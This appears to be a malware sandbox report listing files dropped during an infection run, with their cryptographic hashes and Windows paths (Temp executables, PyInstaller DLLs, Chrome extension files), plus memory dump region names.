MD5 1dccf27f2967601ce6666c8611317f03
SHA1 d8246df2ed9ec4a8a719fd4b1db4fd8a71ef679b
SHA256 6a83ab9a413afd74d77a090f52784b0128527bee9cb0a4224c59d5c75fc18387
SHA512 70b96d69d609211f8b9e05fa510ea7d574ae8da3a6498f5c982aee71635b8a749162247055b7ba21a884bfa06c1415b68912c463f0f1b6ffb9049f3532386877

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-heap-l1-1-0.dll

MD5 b071e761cea670d89d7ae80e016ce7e6
SHA1 c675be753dbef1624100f16674c2221a20cf07dd
SHA256 63fb84a49308b857804ae1481d2d53b00a88bbd806d257d196de2bd5c385701e
SHA512 f2ecbdaba3516d92bd29dcce618185f1755451d95c7dbbe23f8215318f6f300a9964c93ec3ed65c5535d87be82b668e1d3025a7e325af71a05f14e15d530d35f

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-handle-l1-1-0.dll

MD5 7bc1b8712e266db746914db48b27ef9c
SHA1 c76eb162c23865b3f1bd7978f7979d6ba09ccb60
SHA256 f82d05aea21bcf6337ef45fbdad6d647d17c043a67b44c7234f149f861a012b9
SHA512 db6983f5f9c18908266dbf01ef95ebae49f88edc04a0515699ef12201ac9a50f09939b8784c75ae513105ada5b155e5330bd42d70f8c8c48fe6005513aefad2a

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-file-l2-1-0.dll

MD5 7d4d4593b478b4357446c106b64e61f8
SHA1 8a4969c9e59d7a7485c8cc5723c037b20dea5c9d
SHA256 0a6e2224cde90a0d41926e8863f9956848ffbf19848e8855bd08953112afc801
SHA512 7bc9c473705ec98ba0c1da31c295937d97710cedefc660f6a5cb0512bae36ad23bebb2f6f14df7ce7f90ec3f817b02f577317fdd514560aab22cb0434d8e4e0b

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-file-l1-2-0.dll

MD5 f0c73f7454a5ce6fb8e3d795fdb0235d
SHA1 acdd6c5a359421d268b28ddf19d3bcb71f36c010
SHA256 2a59dd891533a028fae7a81e690e4c28c9074c2f327393fab17329affe53fd7b
SHA512 bd6cf4e37c3e7a1a3b36f42858af1b476f69caa4ba1fd836a7e32220e5eff7ccc811c903019560844af988a7c77cc41dc6216c0c949d8e04516a537da5821a3e

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-file-l1-1-0.dll

MD5 642b29701907e98e2aa7d36eba7d78b8
SHA1 16f46b0e057816f3592f9c0a6671111ea2f35114
SHA256 5d72feac789562d445d745a55a99536fa9302b0c27b8f493f025ba69ba31941c
SHA512 1beab2b368cc595beb39b2f5a2f52d334bc42bf674b8039d334c6d399c966aff0b15876105f0a4a54fa08e021cb44907ed47d31a0af9e789eb4102b82025cf57

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 8d6599d7c4897dcd0217070cca074574
SHA1 25eacaaa4c6f89945e97388796a8c85ba6fb01fb
SHA256 a011260fafaaaefd7e7326d8d5290c6a76d55e5af4e43ffa4de5fea9b08fa928
SHA512 e8e2e7c5bff41ccaa0f77c3cfee48dac43c11e75688f03b719cc1d716db047597a7a2ce25b561171ef259957bdcd9dd4345a0e0125db2b36f31698ba178e2248

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-debug-l1-1-0.dll

MD5 e1ca15cf0597c6743b3876af23a96960
SHA1 301231f7250431bd122b12ed34a8d4e8bb379457
SHA256 990e46d8f7c9574a558ebdfcb8739fbccba59d0d3a2193c9c8e66807387a276d
SHA512 7c9dacd882a0650bf2f553e9bc5647e6320a66021ac4c1adc802070fd53de4c6672a7bacfd397c51009a23b6762e85c8017895e9347a94d489d42c50fa0a1c42

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-datetime-l1-1-0.dll

MD5 5af784f599437629deea9fe4e8eb4799
SHA1 3c891b920fd2703edd6881117ea035ced5a619f6
SHA256 7e5bd3ee263d09c7998e0d5ffa684906ddc56da61536331c89c74b039df00c7c
SHA512 4df58513cf52511c0d2037cdc674115d8ed5a0ed4360eb6383cc6a798a7037f3f7f2d587797223ed7797ccd476f1c503b3c16e095843f43e6b87d55ad4822d70

C:\Users\Admin\AppData\Local\Temp\_MEI33322\api-ms-win-core-console-l1-1-0.dll

MD5 b56d69079d2001c1b2af272774b53a64
SHA1 67ede1c5a71412b11847f79f5a684eabaf00de01
SHA256 f3a41d882544202b2e1bdf3d955458be11fc7f76ba12668388a681870636f143
SHA512 7eb8fe111dd2e1f7e308b622461eb311c2b9fc4ef44c76e1def6c524eb7281d5522af12211f1f91f651f2b678592d2997fe4cd15724f700deaff314a1737b3a8

C:\Users\Admin\AppData\Local\Temp\_MEI33322\libffi-7.dll

MD5 4424baf6ed5340df85482fa82b857b03
SHA1 181b641bf21c810a486f855864cd4b8967c24c44
SHA256 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79
SHA512 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33

C:\Users\Admin\AppData\Local\Temp\_MEI33322\_ctypes.pyd

MD5 f1e33a8f6f91c2ed93dc5049dd50d7b8
SHA1 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4
SHA256 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4
SHA512 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5

C:\Users\Admin\AppData\Local\Temp\_MEI33322\base_library.zip

MD5 f4981249047e4b7709801a388e2965af
SHA1 42847b581e714a407a0b73e5dab019b104ec9af2
SHA256 b191e669b1c715026d0732cbf8415f1ff5cfba5ed9d818444719d03e72d14233
SHA512 e8ef3fb3c9d5ef8ae9065838b124ba4920a3a1ba2d4174269cad05c1f318bc9ff80b1c6a6c0f3493e998f0587ef59be0305bc92e009e67b82836755470bc1b13

C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

MD5 f70d82388840543cad588967897e5802
SHA1 cd21b0b36071397032a181d770acd811fd593e6e
SHA256 1be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35
SHA512 3d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6

memory/1720-410-0x0000000000400000-0x0000000000823000-memory.dmp

memory/3776-411-0x0000000000400000-0x0000000000823000-memory.dmp

memory/664-523-0x00007FFBC4B30000-0x00007FFBC5119000-memory.dmp

memory/664-524-0x00007FFBDA5F0000-0x00007FFBDA613000-memory.dmp

memory/664-525-0x00007FFBDBC10000-0x00007FFBDBC1F000-memory.dmp

memory/664-527-0x00007FFBD9510000-0x00007FFBD951D000-memory.dmp

memory/664-528-0x00007FFBD9330000-0x00007FFBD9349000-memory.dmp

memory/664-529-0x00007FFBD61B0000-0x00007FFBD61DD000-memory.dmp

memory/664-526-0x00007FFBDA8E0000-0x00007FFBDA8F9000-memory.dmp

memory/664-530-0x00007FFBD6170000-0x00007FFBD61A6000-memory.dmp

C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE

MD5 17de498486ab8389b310d0ea6b5ffe33
SHA1 e01dc56faffd68ab1d6675ff7c82c5fc1349fafb
SHA256 e465b0d4b8f9d028e868558a8c232ac440e7812b1aa4530ad373d05aa149f3e1
SHA512 7daa8eb5ae9265c7530f0688ad4f617727921db34b4e7afff0b3b6ed32a119fa0f0ab5b287fabe2455fd17467689ffaf23fb9772d9dc1e7205fb518c273798e5

C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe

MD5 ab09d0db97f3518a25cd4e6290862da7
SHA1 9e4d882e41b0ac86be4105f8aa9b3c1526dafbe0
SHA256 fc8cbb7809af3ab0b5f7ed07919bbd6c66366d1ed51681a8b91783ad8dafbb3d
SHA512 46553192614fd127640fead944f6e631a30d2ebae75262b5e1ff17742ef2c50bcea229bbc74800a9f1c854369012cd1645368733f1d09e8ba8b43c7819a7314a

C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe

MD5 001d7acad697c62d8a2bd742c4955c26
SHA1 840216756261f1369511b1fd112576b3543508f7
SHA256 de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512 f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe

MD5 971c0e70de5bb3de0c9911cf96d11743
SHA1 43badfc19a7e07671817cf05b39bc28a6c22e122
SHA256 67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d
SHA512 a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe

MD5 5e69c9fb2a63cb96bcbce0d288e02106
SHA1 ee7d2d33ca669f5e6e2a54d1c5ff309b71c18be6
SHA256 5bca9f783d05b16383ebc8fa322469ce2cd33ba79d0407a72f4b06df3598c5ff
SHA512 aea9b5e541dd7add99bdee079895b36b1e4de888944fcf0d1460e3e851cc2443707d476c3dca531266ac0cf22e48ea8af89f30ebd87ce5c55b82b81ba3bc64eb

C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe

MD5 434f706017b7f673ed5586f1470d7d28
SHA1 f431be69eab7bec0c1752f54977e32fd60278617
SHA256 a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a
SHA512 d019cb403225f85f5344fb94da6257b216baa5b66000821a0357b03db9da555e51a6cfad576570bfc62f0db8077d92af9793843d48b0e1045ede79e14c4222d7

C:\ProgramData\bi5pp\zcbasrq90

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe

MD5 03e19c0d1438863db3987eaa0b5e64d1
SHA1 d0918d24bd2ec2c00ddf061c0959060475e3ea6a
SHA256 62577f16bab122613b5f4c89c3db52b4ee9698300b96417462ef19499cdf27a8
SHA512 47f45259bd75acd7c90c07fd98dc527810b27f9aa0283799029d7a1bde0d2bbbb8b3e61b579acb472bc4217c3f168b664d7c3f87265b213f156a34a416902b70

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe

MD5 7ff72f21d83d3abdc706781fb3224111
SHA1 3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8
SHA256 0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea
SHA512 dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d

C:\Users\Admin\AppData\Local\Temp\scoped_dir5468_2036446822\13cb42d8-599a-4f46-8481-2038284758d1.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir5468_2036446822\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 6ff7a45c2833c230cd13198531f28f34
SHA1 6933179b048c91376f68fe16e4d696861f019ea7
SHA256 6f9979dcdea86619f091d6dd390142da54a7910629e467051d7e336f40fa8ac5
SHA512 e90a9e6bb58aeb2cb26d61b134ecc91eb7af3828e4317cd41ace1a75af336f92fbce9ad2515f7d2efc9e8144d58018bd13fac1113366afb86a6d464a45498883